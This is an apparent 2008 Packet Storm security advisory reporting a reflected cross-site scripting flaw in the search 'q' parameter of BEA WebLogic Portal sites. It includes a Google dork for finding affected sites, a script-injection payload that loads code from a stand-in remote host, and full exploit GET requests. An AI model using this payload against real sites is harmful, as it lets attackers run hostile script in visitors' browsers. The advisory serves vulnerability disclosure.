bea-xss.txt

2008-06-02T00:00:00
ID PACKETSTORM:66895
Type packetstorm
Reporter Ivan Sanchez
Modified 2008-06-02T00:00:00

Description

                                        
                                            `+============================================================================================+  
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +  
+============================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Producto:  
---------  
BEA Systems Inc  
http://www.bea.com  
Oracle Corporation BEA WebLogic Portal (and others)  
  
  
Nullcode,has reported a vulnerability in BEA WebLogic Portal Domains,  
which can be exploited by malicious people to conduct high cross-site scripting attacks.  
  
Input passed to the "q" parameter in this function "search_g4.js" isn't properly sanitised.  
  
This can be exploited to execute remotes arbitrary script in a user's browser.  
  
  
The vulnerability has been reported in all domains *Bea.com, all sites are using the same function." to search some things"  
So..Other versions and others products(BEA-Company) may also be affected.  
  
  
  
Google Dork:  
-----------  
  
site:bea.com/  
  
You can see hundreds of sites.  
  
  
Function vulnerable:  
--------------------  
  
  
GET http://www.bea.com/content/search/search_g4.js HTTP/1.1  
  
search_g4.js   
  
  
("textbox search" ,insert for example): "><script src=http://site/evil-remote-code.js></script>  
  
  
seconds....  
  
Then redirect to other BEA application:  
---------------------------------------  
  
  
Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>  
  
  
GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1 => HTTP/1.1 200 OK[1.922 s]  
  
seconds..... simply exploited....  
  
  
Extract Internal code:  
  
1-  
<form action="http://seeker.bea.com/search" method="get" class="formspace"><div class="searchSpacer3"> <label for="search"></label><input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';"><input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0" onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'" style="vertical-align:bottom;">  
  
2-   
you can see URL://"the QueryStrings"  
  
  
  
  
Solution:  
---------  
Edit the source code to ensure that input is properly sanitised.  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
  
+============================================================================================+  
  
  
+============================================================================================+  
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +  
+============================================================================================+  
  
  
  
  
`